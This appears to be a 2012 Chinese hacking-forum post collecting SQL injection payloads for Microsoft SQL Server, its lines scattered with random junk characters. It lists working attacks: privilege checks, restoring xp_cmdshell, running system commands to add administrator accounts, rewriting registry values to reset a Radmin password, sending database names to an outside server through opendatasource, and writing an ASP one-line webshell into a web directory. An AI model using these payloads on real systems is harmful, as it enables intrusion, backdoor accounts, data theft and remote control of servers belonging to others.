找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1912|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令  C7 c# e( G: H* \% C6 }
//看看是什么权限的
5 W* T2 a" Q; }& r3 M: x3 qand 1=(Select IS_MEMBER('db_owner'))
7 \* c0 l0 D: L1 y" {$ F6 u0 k9 lAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
; t+ u# r. `( L/ W3 w# V* {( [+ z  c
//检测是否有读取某数据库的权限; U' U6 D" |5 m! C" D5 e8 V
and 1= (Select HAS_DBACCESS('master'))
( Z/ L# ^, U) KAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
3 r$ v3 b5 K; W% v; b5 v, B
& r8 ?; l5 E! o& C
& E$ A2 _2 i, S8 C. i数字类型' b! D; g7 Y0 p1 l; n
and char(124)%2Buser%2Bchar(124)=0
' V: a$ v1 Z1 M% v
: ~% C6 N: }$ k  C7 w4 u6 r字符类型
0 [& Q) _4 [& P+ R' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 `1 [5 ~, x4 k6 A, \) ?  C2 H' t9 G9 x4 x* K) w' P1 s* o
搜索类型
' m& b8 m, p6 I+ ?' and char(124)%2Buser%2Bchar(124)=0 and '%'='7 x8 }# Y2 `% o6 D  O+ e/ e& o0 ?7 a

" }$ t# b4 J  U% @9 _7 z爆用户名$ j( F* c5 J# ?$ K6 f
and user>0" G% W/ X7 h# y
' and user>0 and ''='5 ]. `) m! G9 ~' m

: M! ], x! j. t检测是否为SA权限7 C( j( v) r8 q6 P1 y5 v7 T  W
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
! v$ J' J0 F, R% m6 d5 m' VAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --3 s1 }5 U7 }3 `! l/ [

* f# m7 Q/ B) E" f) u0 i$ |检测是不是MSSQL数据库# {# J$ j- D" H0 `+ j! v9 ?; b
and exists (select * from sysobjects);--
* N4 F% w$ i% b+ m. c
0 b  J/ a, X! S* z: g) e1 A7 c检测是否支持多行4 @- ?9 q& K' B* J: e
;declare @d int;--
7 e& }/ o4 A: g, F
/ h& E" a+ }6 k8 m- i. B$ [恢复 xp_cmdshell% G  S6 x# W9 I- Y* X
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--! F3 P% b# H3 Z+ x
4 a" V1 M3 z) D) j0 a

5 s8 T. G5 {4 q4 q# i# F4 _select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
) o7 l! l! ?' B7 x. i7 p. R
. ^. t$ ~  o  i//-----------------------
, I1 K) n5 F& u( K6 ?7 w! c5 y//      执行命令
9 n5 u1 {- t. ^1 f1 A9 ?" c//-----------------------
3 q9 ]9 X- |, h/ G: |% [9 Z首先开启沙盘模式:* n1 F* U9 o9 r6 d$ g0 H  y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',12 o  O* f+ c3 ~* n/ E! w
( k' b: _$ O( E4 i
然后利用jet.oledb执行系统命令* t6 F/ d( h9 e. _7 v! ~
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
2 K* q% D' T) D( C1 H/ \* b2 `/ v- d5 j3 G5 y' O% ^) K/ F9 o2 w1 E4 e
执行命令  [5 V2 j2 g4 h8 l) J% ]
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
5 s" ~. O- H) q) V* h5 |: x- l9 F3 ]7 h: N
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'" x  t  w) r) \5 d
- C0 R& @( l! T
判断xp_cmdshell扩展存储过程是否存在:0 x! d! ~8 Q, Y6 U9 b* n4 F
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
+ k3 }' {1 J6 p, u8 e9 J/ X8 C& |- ?% Y. B- Z1 A- A
写注册表
# ^. E9 `" ~! e9 q9 B5 nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1  g, u; U2 o* c  X5 N

1 g' g$ [% e' A5 ]REG_SZ
* \. a- g4 h; o. p# b# W, Z2 m3 b& c" c$ U* k5 W( S% Z% G
读注册表
, A: A& }0 r; k4 b7 P0 ^3 C4 [exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
3 R5 b0 {/ ?7 U2 M
- {: m. T) P: f% q' h读取目录内容
  t4 r; B* @  T; m7 J& w6 j% \# oexec master..xp_dirtree 'c:\winnt\system32\',1,1
4 Z! I9 Y. B, T* h
$ R3 Y& q6 Y5 I$ u& P( g2 K# s( Q' k6 |& i0 y0 e/ O9 o7 ~
数据库备份2 _% ?, M- w& d" L6 Y
backup database pubs to disk = 'c:\123.bak'
9 V4 d9 z2 P' ~. V& b
. F, Y, ^, N6 g# j9 A1 {9 y//爆出长度% _( T. N6 R7 c6 ]* \) w) j
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
) B# A; c/ ]* o; o, V* F( c" o% U% y+ e! }( V5 c" S0 x

+ z, s3 d3 n" j9 q7 N
6 o* e+ \3 ]6 g更改sa口令方法:用sql综合利用工具连接后,执行命令:
- g* m% w9 x0 M& Texec sp_password NULL,'新密码','sa'
2 F7 y) c0 o, G/ O
- n9 B0 N3 g9 d7 A8 @. i2 ^添加和删除一个SA权限的用户test:4 o+ s6 G: x4 g
exec master.dbo.sp_addlogin test,ptlove4 W2 E/ W, n, ~0 L8 ]( H5 ?
exec master.dbo.sp_addsrvrolemember test,sysadmin
) z4 B1 R( y3 c; R, H) Z- x2 ^# R1 z2 o& l8 a  A1 S! p
删除扩展存储过过程xp_cmdshell的语句:
5 q' z4 k- k- P* yexec sp_dropextendedproc 'xp_cmdshell'
) x0 U) J- y9 U0 T8 k) n% p. O6 t8 e4 Y$ G! e' A8 x: y
添加扩展存储过过程
$ |4 H8 b# \7 `% L& V$ C$ K& ~& iEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
! r( U' K2 k% R9 |GRANT exec On xp_proxiedadata TO public ( e, C: p  r' U
( J/ H$ F' r" a5 w' U. s7 E" b

3 }0 p( G- ?4 V8 H6 }( B$ {停掉或激活某个服务。
/ V2 F: u+ \! }- G& e) k- `$ d7 t9 C# S- K. r
exec master..xp_servicecontrol 'stop','schedule'
& y6 z) z1 C9 i% J* }exec master..xp_servicecontrol 'start','schedule'
6 _  |$ n; e8 u+ v
+ J! q$ M# ]  N2 n; |" B: j2 J, pdbo.xp_subdirs( ?7 [4 }/ C9 A# Y" K, C

5 x( p; P0 x% P6 z7 @6 V. O( b只列某个目录下的子目录。3 H8 }0 i* E' L9 [
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'1 L* [1 A, `) g
4 M3 q1 |/ D) L2 s
dbo.xp_makecab- }9 J8 e. ], A  j9 d( v# a# d4 l( x
/ x& k6 ~- J. ]
将目标多个档案压缩到某个目标档案之内。
* h5 u5 B3 ^: Z' v所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。+ I: `1 \, `( I4 V& P

/ O- b$ a) k  k7 _8 g- v8 E: ddbo.xp_makecab( T- i3 C' b; Y
'c:\test.cab','mszip',1,% A5 f4 D5 Y) \( @6 [, C! ]  [3 A% l
'C:\Inetpub\wwwroot\SQLInject\login.asp',- D3 e# q" Y( t- E$ L& w
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
6 c! M8 s1 `% ^$ [% D3 x5 j& k. q
xp_terminate_process
( |1 I/ T, \: T, d1 S) J) q
( ]% y* M5 |2 d1 t停掉某个执行中的程序,但赋予的参数是 Process ID。
/ C0 R/ V# |# `. W7 p利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
" @  E" x. E5 q7 X: R# l! X& A, N4 U$ m$ b
xp_terminate_process 24840 w& |' R" [& J: R1 q& l% Z2 B4 x
, p' y7 C5 s: O6 N+ a
xp_unpackcab1 }( g( w/ r$ D' U
# ]1 n6 [$ D( P1 E
解开压缩档。& s7 x" y* f) f6 j
/ g* c" j( A+ ]+ t
xp_unpackcab 'c:\test.cab','c:\temp',15 W  j- N1 @, N1 [7 J1 T2 Y

: s+ Y# r8 W( d. J- O( ?9 I4 g$ ~; U: v% ^! L& G- ?$ b7 S
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234! D( X4 R6 ]( v- e* H1 W
, ]% v2 O6 L5 Q- B
create database lcx;; Z/ o/ w/ t6 b3 Q' q" n
Create TABLE ku(name nvarchar(256) null);
! @! L+ v- ~2 q" G* n% }  Y5 O8 ?' s# LCreate TABLE biao(id int NULL,name nvarchar(256) null);
. k  r  ~; Q& j6 w) k1 G' B9 v5 j2 v" R) w# H5 g
//得到数据库名. j# {4 K8 V7 t. i) ^/ L% E/ g* B) X
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases7 I. {) n8 \: I& {% c6 l; ?
% t  d4 Q+ _! y7 l8 C
( q3 X6 m$ T) u& b
//在Master中创建表,看看权限怎样7 x+ |3 d$ g7 X0 D- G5 ~
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--- K: u3 t1 T( V# {
7 y3 Y# ^$ G; L
用 sp_makewebtask直接在web目录里写入一句话马:: _* C, v- \% W0 E. H
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 x2 ^& ^# a/ K4 q2 b: c, L
' {1 x# @' I  ]& p- [, @//更新表内容0 a1 i0 R2 t8 N% {
Update films SET kind = 'Dramatic' Where id = 123! w2 q9 a- r; A6 g

* D3 Y2 n9 S/ k. m6 o! @9 n//删除内容
  x1 M1 e* V" E" t( Q0 h+ gdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表